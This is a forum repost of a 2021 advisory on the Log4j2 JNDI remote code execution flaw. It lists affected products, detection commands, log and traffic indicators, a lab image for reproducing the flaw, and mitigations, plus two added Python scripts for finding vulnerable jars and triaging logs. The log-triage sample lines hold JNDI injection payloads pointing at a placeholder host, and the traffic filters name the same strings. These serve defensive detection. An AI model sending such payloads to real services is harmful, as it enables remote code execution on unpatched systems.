Xiasha Forum (下沙论坛)

Apache Log4j2 Remote Code Execution Vulnerability

Posted 2021-12-15 10:10:25
Vulnerability Description

Apache Log4j2 is a Java-based logging tool. It is a rewrite of the Log4j framework and introduces a large number of rich features. The framework is widely used in business system development to record log messages.

In most cases, developers may write error messages derived from user input to the log. An attacker can abuse this behaviour by crafting a special request payload that ultimately triggers remote code execution. Because the impact of this vulnerability is extremely wide, users are advised to check their systems promptly; analysis by the NOSEC (白帽汇) Security Research Institute has confirmed that many popular systems on the market are affected.

Severity: Critical

Affected Versions

Apache Log4j 2.x < 2.15.0-rc2

Known Affected Components
• Apache Struts2
• Apache Solr
• Apache Flink
• Apache Druid
• flume
• dubbo
• logstash
• VMware Horizon
• VMware vCenter Server
• VMware HCX
• VMware NSX-T Data Center
• VMware Unified Access Gateway
• VMware WorkspaceOne Access
• VMware Identity Manager
• VMware vRealize Operations
• VMware vRealize Operations Cloud Proxy
• VMware vRealize Log Insight
• VMware vRealize Automation
• VMware vRealize Lifecycle Manager
• VMware Telco Cloud Automation
• VMware Site Recovery Manager
• VMware Carbon Black Cloud Workload Appliance
• VMware Carbon Black EDR Server
• VMware Tanzu GemFire
• VMware Tanzu Greenplum
• VMware Tanzu Operations Manager
• VMware Tanzu Application Service for VMs
• VMware Tanzu Kubernetes Grid Integrated Edition
• VMware Tanzu Observability by Wavefront Nozzle
• Healthwatch for Tanzu Application Service
• Spring Cloud Services for VMware Tanzu
• Spring Cloud Gateway for VMware Tanzu
• Spring Cloud Gateway for Kubernetes
• API Portal for VMware Tanzu
• Single Sign-On for VMware Tanzu Application Service
• App Metrics
• VMware vCenter Cloud Gateway
• VMware Tanzu SQL with MySQL for VMs
• VMware vRealize Orchestrator
• VMware Cloud Foundation
• VMware Workspace ONE Access Connector
• VMware Horizon DaaS
• VMware Horizon Cloud Connector

Affected Open-Source Components

Project | Repository | Versions (one affected version shown, with the total number of affected versions)

elasticsearch (org.elasticsearch) | https://github.com/elastic/elasticsearch | 8.0.0-alpha2 and others (100 total)
spring-webflux (org.springframework) | https://github.com/spring-projects/spring-framework | 5.2.6.RELEASE and others (40 total)
druid (com.alibaba) | https://github.com/alibaba/druid | 1.2.8 and others (68 total)
hystrix-rx-netty-metrics-stream (com.netflix.hystrix) | https://github.com/Netflix/Hystrix | 1.5.4 and others (2 total)
spring-cloud-starter-alibaba-sentinel (com.alibaba.cloud) | https://github.com/alibaba/spring-cloud-alibaba | 2021.1 and others (14 total)
spring-boot-starter-ahas-sentinel-client (com.alibaba.csp) | https://github.com/alibaba/Sentinel | 1.3.2 and others (17 total)
redisson (org.redisson) | https://github.com/redisson/redisson | 2.2.24 and others (3 total)
HikariCP (com.zaxxer) | https://github.com/brettwooldridge/HikariCP | 5.0.0 and others (27 total)
zipkin-collector-service (io.zipkin) | https://github.com/openzipkin/zipkin | 1.40.2 and others (27 total)
mybatis-plus (com.baomidou) | https://github.com/baomidou/mybatis-plus | 3.4.3.4 and others (41 total)
zuul-sample (com.netflix.zuul) | https://github.com/Netflix/zuul | 2.3.0 and others (10 total)
watson-data-api-client (com.ibm.watson.data) | https://github.com/OpenAPITools/openapi-generator | 0.1 (1 total)
spring-boot-admin-sample-consul (de.codecentric) | https://github.com/codecentric/spring-boot-admin | 2.5.4 and others (40 total)
jedis (redis.clients) | https://github.com/redis/jedis | jedis-3.6.2 and others (36 total)
grpc-benchmarks (io.grpc) | https://github.com/grpc/grpc-java | 1.9.1 and others (65 total)
ktor-client-json-tests (io.ktor) | https://github.com/ktorio/ktor | 1.6.7 and others (32 total)
gitbucket_2.13 (io.github.gitbucket) | https://github.com/gitbucket/gitbucket | 4.32.0 and others (27 total)
finagle-zipkin_2.12 (com.twitter) | https://github.com/twitter/finagle | 7.1.0 and others (56 total)
resilience4j-vertx (io.github.resilience4j) | https://github.com/resilience4j/resilience4j | 0.9.0 and others (9 total)
elasticsearch-sql (org.nlpcn) | https://github.com/NLPchina/elasticsearch-sql | 6.8.13.0 and others (9 total)
exposed-spring-boot-starter (org.jetbrains.exposed) | https://github.com/JetBrains/Exposed | 0.36.2 and others (11 total)
blade-sql2o (com.bladejava) | https://github.com/lets-blade/blade | 1.2.9 (1 total)
netty-socketio (com.corundumstudio.socketio) | https://github.com/mrniko/netty-socketio | 1.7.19 and others (8 total)
springfox-swagger2 (io.springfox) | https://github.com/springfox/springfox | 2.10.5 and others (6 total)
main_2.12 (org.scala-sbt) | https://github.com/sbt/sbt | 1.6.0-RC1 and others (88 total)
lettuce-core (io.lettuce) | https://github.com/lettuce-io/lettuce-core | 6.1.5.RELEASE and others (42 total)
repository-azure (org.opensearch.plugin) | https://github.com/opensearch-project/OpenSearch | 1.2.0 and others (3 total)
reactor-test (io.projectreactor) | https://github.com/reactor/reactor-core | 3.3.4.RELEASE and others (3 total)
corda-webserver-impl (net.corda) | https://github.com/corda/corda | corda-3.0 and others (32 total)
conductor-redis-persistence (com.netflix.conductor) | https://github.com/Netflix/conductor | 3.3.6 and others (100 total)
armeria (com.linecorp.armeria) | https://github.com/line/armeria | 0.26.1.Final and others (2 total)
breeze-parent_2.13 (org.scalanlp) | https://github.com/scalanlp/breeze | 2.0.1-RC1 and others (5 total)
micrometer-core (io.micrometer) | https://github.com/micrometer-metrics/micrometer | 1.8.1 and others (98 total)
alink_connector_jdbc_sqlite_flink-1.9_2.11 (com.alibaba.alink) | https://github.com/alibaba/Alink | 1.5.1 and others (3 total)
initializr-actuator (io.spring.initializr) | https://github.com/spring-io/initializr | 0.9.0 and others (6 total)
telegrambots-spring-boot-starter (org.telegram) | https://github.com/rubenlagus/TelegramBots | 4.9.1 and others (17 total)
spring-data-elasticsearch (org.springframework.data) | https://github.com/spring-projects/spring-data-elasticsearch | 4.3.0 and others (86 total)
feast-common (dev.feast) | https://github.com/feast-dev/feast | 0.9.2 and others (26 total)
javamelody-core (net.bull.javamelody) | https://github.com/javamelody/javamelody | 1.88.0 and others (13 total)
analytics-zoo-bigdl_0.13.0-spark_3.0.0 (com.intel.analytics.zoo) | https://github.com/intel-analytics/analytics-zoo | 0.11.0-RC1 and others (4 total)
scio-tensorflow_2.13 (com.spotify) | https://github.com/spotify/scio | 0.9.6 and others (97 total)
grpc-client-spring-boot-autoconfigure (net.devh) | https://github.com/yidongnan/grpc-spring-boot-starter | 2.9.0.RELEASE and others (16 total)
inject-server_2.12 (com.twitter) | https://github.com/twitter/finatra | 21.9.0 and others (56 total)
client-java-examples (io.kubernetes) | https://github.com/kubernetes-client/java | 8.0.2 (1 total)
reactivesocket-tck-drivers (io.reactivesocket) | https://github.com/rsocket/rsocket-java | 0.6.0 (1 total)
jest-droid (io.searchbox) | https://github.com/searchbox-io/Jest | 6.3.1 and others (8 total)
graphql-dgs-example-java-webflux (com.netflix.graphql.dgs) | https://github.com/Netflix/dgs-framework | 4.9.7 and others (36 total)
quill-jdbc-monix_2.11 (io.getquill) | https://github.com/getquill/quill | 3.9.0 and others (62 total)
doobie-quill_2.12 (org.tpolecat) | https://github.com/tpolecat/doobie | 1.0.0-RC1 and others (61 total)
http4k (org.http4k) | https://github.com/http4k/http4k | 4.3.4.1 and others (3 total)
elasticsearch-hadoop (org.elasticsearch) | https://github.com/elastic/elasticsearch-hadoop | 8.0.0-beta1 and others (100 total)
sbt-shading (io.get-coursier) | https://github.com/coursier/coursier | 1.0.0-RC8 (1 total)
spark-cassandra-connector-unshaded_2.10 (com.datastax.spark) | https://github.com/datastax/spark-cassandra-connector | 2.0.9 and others (54 total)
webdrivermanager (io.github.bonigarcia) | https://github.com/bonigarcia/webdrivermanager | 4.0.0 and others (15 total)
common-auth-v3 (com.tencent.bk.devops.ci.common) | https://github.com/Tencent/bk-ci | 1.2.0-rc.7-RELEASE and others (3 total)
reactor-netty (io.projectreactor.netty) | https://github.com/reactor/reactor-netty | 1.0.9 and others (75 total)
evcache-client-sample (com.netflix.evcache) | https://github.com/Netflix/EVCache | 5.18.9 and others (63 total)
xtdb-test (com.xtdb) | https://github.com/xtdb/xtdb | 1.20.0 and others (9 total)
transport-netty4 (com.strapdata.elasticsearch.plugin) | https://github.com/strapdata/elassandra | 6.2.3.31 and others (14 total)
sbt-metals (org.scalameta) | https://github.com/scalameta/metals | 0.9.9 and others (17 total)
elastic4s-embedded_2.12 (com.sksamuel.elastic4s) | https://github.com/sksamuel/elastic4s | 6.7.8 and others (100 total)
genie-agent (com.netflix.genie) | https://github.com/Netflix/genie | 4.0.4 and others (100 total)
spring-kafka (org.springframework.kafka) | https://github.com/spring-projects/spring-kafka | 2.7.9 and others (79 total)
db-async-common_2.13 (com.dripower) | https://github.com/mauricio/postgresql-async | 0.3.109 and others (19 total)
selenide (com.codeborne) | https://github.com/selenide/selenide | 5.25.0-selenium-4.0.0-rc-2 and others (18 total)
cloudfoundry-identity-server (org.cloudfoundry.identity) | https://github.com/cloudfoundry/uaa | 4.30.0 (1 total)
servo-atlas (com.netflix.servo) | https://github.com/Netflix/servo | 0.13.2 and others (20 total)
rxnetty-spectator-tcp (io.reactivex) | https://github.com/ReactiveX/RxNetty | 0.5.3-rc.4 and others (12 total)
mleap-tensorflow_2.10 (ml.combust.mleap) | https://github.com/combust/mleap | 0.9.6 and others (25 total)
spark-testing-base_2.12 (com.holdenkarau) | https://github.com/holdenk/spark-testing-base | 2.4.4_1.1.1 and others (100 total)
graphql-kotlin-spring-client (com.expediagroup) | https://github.com/ExpediaGroup/graphql-kotlin | 5.0.0-alpha.0 and others (20 total)
graphql-spring-boot-test-autoconfigure (com.graphql-java-kickstart) | https://github.com/graphql-java-kickstart/graphql-spring-boot | 8.1.1 and others (33 total)
discord4j-rest (com.discord4j) | https://github.com/Discord4J/Discord4J | 3.2.1 and others (15 total)
twitter-server-logback-classic_2.13 (com.twitter) | https://github.com/twitter/twitter-server | 21.9.0 and others (54 total)
synthea (org.mitre.synthea) | https://github.com/synthetichealth/synthea | 2.7.0 and others (2 total)
spring-integration-redis (org.springframework.integration) | https://github.com/spring-projects/spring-integration | 5.5.6 and others (30 total)
cyclops-reactor-integration (com.oath.cyclops) | https://github.com/aol/cyclops | 10.4.0 (1 total)
akka-stream-alpakka-geode_2.12 (com.lightbend.akka) | https://github.com/akka/alpakka | 1.0-M1 and others (13 total)
mantis-client (io.mantisrx) | https://github.com/Netflix/mantis | 1.3.9 and others (83 total)
mybatis-generator-plugin (com.itfsw) | https://github.com/itfsw/mybatis-generator-plugin | 1.2.9 and others (31 total)
ktorm-support-sqlserver (org.ktorm) | https://github.com/kotlin-orm/ktorm | 3.3.0 and others (11 total)
gatk (org.broadinstitute) | https://github.com/broadinstitute/gatk | 4.beta.2 and others (39 total)
azure-messaging-servicebus (com.azure) | https://github.com/Azure/azure-sdk-for-java | 7.5.1 and others (100 total)
mica-metrics (net.dreamlu) | https://github.com/lets-mica/mica | 2.5.7 and others (7 total)
shiro-redis (org.crazycake) | https://github.com/alexxiyang/shiro-redis | 3.3.1 and others (2 total)
enumeratum-play_2.12 (com.beachape) | https://github.com/lloydmeta/enumeratum | 1.5.16 and others (2 total)
jdonframework (org.jdon) | https://github.com/banq/jdonframework | 6.6.8 (1 total)
weid-java-sdk (com.webank) | https://github.com/WeBankBlockchain/WeIdentity | 1.8.1 and others (3 total)
log-protocol (io.shulie.pradar) | https://github.com/shulieTech/Takin | 2.0.3 and others (3 total)
micro-boot (com.oath.microservices) | https://github.com/aol/micro-server | 1.2.6 and others (38 total)
sparkling-water-package_2.11 (ai.h2o) | https://github.com/h2oai/sparkling-water | 2.4.10 and others (36 total)
scalatest_2.13 (au.com.dius.pact.provider) | https://github.com/pact-foundation/pact-jvm | 4.2.4 and others (5 total)
mssql-jdbc (com.microsoft.sqlserver) | https://github.com/microsoft/mssql-jdbc | 8.3.0.jre11-preview and others (100 total)
elide-spring-boot-starter (com.yahoo.elide) | https://github.com/yahoo/elide | 6.0.3 and others (45 total)
kafka-connect-elastic5 (com.datamountaineer) | https://github.com/lensesio/stream-reactor | 1.2.0 and others (5 total)
kvision-server-spring-boot-jvm (io.kvision) | https://github.com/rjaros/kvision | 5.4.3 and others (9 total)
r2dbc-postgresql (org.postgresql) | https://github.com/pgjdbc/r2dbc-postgresql | 0.9.0.RC1 and others (8 total)
play-slick-evolutions_2.13 (com.typesafe.play) | https://github.com/playframework/play-slick | 5.0.0-RC3 and others (29 total)
sbt-bloop-core (ch.epfl.scala) | https://github.com/scalacenter/bloop | 1.4.8-43-c2d941d9 and others (29 total)
jcseg-elasticsearch (org.lionsoul) | https://github.com/lionsoul2014/jcseg | 2.6.2 and others (7 total)

For more affected components, query the following link: https://log4j2.huoxian.cn/

Vulnerability Check

Code check: look in pom.xml for dependencies on org.apache.logging.log4j or org.apache.logging.log4j2.

Linux:

sudo find / -name "*log4j-*.jar"

Windows: search the file system for files matching

*log4j*.jar
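The pom.xml and jar checks above can be scripted. The following Python is an added example (not code from the original post or from the nosec.org advisory): it walks a directory tree, flags pom.xml files that declare org.apache.logging.log4j, and reads each log4j-*.jar's manifest so that 2.x versions below 2.15.0 are flagged from the recorded version rather than guessed from the file name. It assumes jars carry the usual Implementation-Version manifest field and builds a constructed sample tree for a dry run.

```python
import os
import re
import tempfile
import zipfile
from pathlib import Path

FIXED = (2, 15, 0)                       # the post names log4j-2.15.0-rc2 as the fix
JAR_RE = re.compile(r"log4j-.*\.jar$")   # same pattern as the find command above
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")

def jar_version(jar):
    """(major, minor, patch) from META-INF/MANIFEST.MF, else from the file name.
    Pre-release suffixes are ignored, so a 2.15.0-rc1 jar still needs a manual look."""
    text = jar.name
    try:
        with zipfile.ZipFile(jar) as zf:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
        if m:
            text = m.group(1)
    except (zipfile.BadZipFile, KeyError):
        pass  # not a zip, or no manifest: fall back to the file name
    v = VERSION_RE.search(text)
    return tuple(int(x) for x in v.groups()) if v else None

def scan(root):
    """Walk root; return (path, kind, detail) for the pom.xml and jar checks in the post."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = Path(dirpath, name)
            if name == "pom.xml" and "org.apache.logging.log4j" in p.read_text("utf-8", "replace"):
                findings.append((str(p), "pom", "declares org.apache.logging.log4j"))
            elif JAR_RE.search(name):
                v = jar_version(p)
                if v is None:
                    findings.append((str(p), "jar", "version unknown, inspect manually"))
                elif v[0] == 2 and v < FIXED:   # 1.x jars are outside the post's scope
                    findings.append((str(p), "jar", "vulnerable %d.%d.%d < 2.15.0" % v))
    return findings

def build_sample(root=None):
    """Constructed sample tree (not real software): one old jar, one fixed jar, one pom.xml."""
    root = Path(root or tempfile.mkdtemp())
    for ver in ("2.14.1", "2.15.0"):
        with zipfile.ZipFile(root / f"log4j-core-{ver}.jar", "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {ver}\n")
    (root / "pom.xml").write_text("<project><dependencies><dependency><groupId>org.apache.logging.log4j"
                                  "</groupId><artifactId>log4j-core</artifactId></dependency></dependencies></project>")
    return root
```

Run scan("/") on a host to reproduce the post's find command with version information attached; scan(build_sample()) exercises it on the constructed tree.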

Attack Investigation

Log check:

Before exploitation, attackers usually scan and probe using dnslog. For the common exploitation methods, search the application's error logs for the following keywords:

"javax.naming.CommunicationException"

"javax.naming.NamingException: problem generating object using object factory"

"Error looking up JNDI resource"

Traffic check:

Attacker packets may contain the strings "${jndi:rmi" or "${jndi:ldap"; filter on these keywords.
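The log and traffic keywords above, applied to sample lines. This Python is an added example, not code from the original post: it tags each line with the matching indicator and counts the tags. It generalises the post's two prefixes to any ${jndi:<scheme> lookup (ldap, rmi, dns, ...) and matches case-insensitively, since the post notes that dnslog probing usually precedes exploitation; the sample lines are constructed and use reserved .invalid hostnames.

```python
import re
from collections import Counter

# Error-log keywords the post says exploitation attempts leave behind
LOG_MARKERS = (
    "javax.naming.CommunicationException",
    "javax.naming.NamingException: problem generating object using object factory",
    "Error looking up JNDI resource",
)
# Request-data marker, case-insensitive and tolerant of whitespace around the separators
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)

def classify(line):
    """Tag one line: 'jndi-lookup:<scheme>', 'jndi-error', or None if nothing matches."""
    m = JNDI_RE.search(line)
    if m:
        return "jndi-lookup:" + m.group(1).lower()
    if any(marker in line for marker in LOG_MARKERS):
        return "jndi-error"
    return None

def triage(lines):
    """Return (hits, counts): hits as (line_no, tag, line), counts as a Counter of tags."""
    hits = [(n, classify(line), line.rstrip()) for n, line in enumerate(lines, 1)]
    hits = [h for h in hits if h[1]]
    return hits, Counter(tag for _, tag, _ in hits)

# Constructed sample (not real traffic): access-log lines, application error lines
# and benign lines; hostnames use the reserved .invalid TLD.
SAMPLE = [
    '192.0.2.10 - - [15/Dec/2021:10:10:25 +0800] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [15/Dec/2021:10:10:26 +0800] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://probe.example.invalid/x}"',
    "2021-12-15 10:10:26,410 ERROR [http-nio-8080-exec-3] JndiLookup - Error looking up JNDI resource [ldap://probe.example.invalid/x].",
    "javax.naming.CommunicationException: probe.example.invalid:389 [Root exception is java.net.ConnectException: Connection refused]",
    '192.0.2.12 - - [15/Dec/2021:10:11:02 +0800] "GET /?q=${JNDI:rmi://probe.example.invalid/y} HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    "2021-12-15 10:11:05,000 INFO  [main] Application started in 2.3 seconds",
]

if __name__ == "__main__":
    hits, counts = triage(SAMPLE)
    for n, tag, line in hits:
        print(f"line {n}: {tag}")
    print(dict(counts))
```

Feed it real files with triage(open(path)) and pivot on the source address of any jndi-lookup hit; a jndi-error hit with no matching request line usually means the request arrived through a header or field that the access log does not record.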

Vulnerability Reproduction

Vulfocus lab environment

Vulfocus has integrated a Log4j2 environment, which can be started for testing via the following link:

http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c

Alternatively, pull the image locally with docker pull vulfocus/log4j2-rce-2021-12-09:latest and start it with: docker run -d -P vulfocus/log4j2-rce-2021-12-09:latest

Remediation

1. Block outbound connections from servers running log4j, and upgrade the JDK to 11.0.1, 8u191, 7u201, 6u211 or later. Note that these JDK releases only stop remote class loading through LDAP/RMI codebases; they do not remove the vulnerable lookup, so the JDK upgrade is a mitigation rather than a fix.

2. Upgrade to log4j-2.15.0-rc2:

   Download: https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

3. Emergency mitigations:

(1) Add the JVM parameter -Dlog4j2.formatMsgNoLookups=true

(2) Set the configuration property log4j2.formatMsgNoLookups=True

(3) Set the system environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true

Caveat: the formatMsgNoLookups switch exists only in Log4j 2.10.0 and later, so on older 2.x releases the measures under 3 have no effect and only the upgrade under 2 helps. Log4j itself reads the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS as the equivalent of the log4j2.formatMsgNoLookups property, so set that one as well and verify the running process actually picked it up.



    via https://nosec.org/home/detail/4917.html

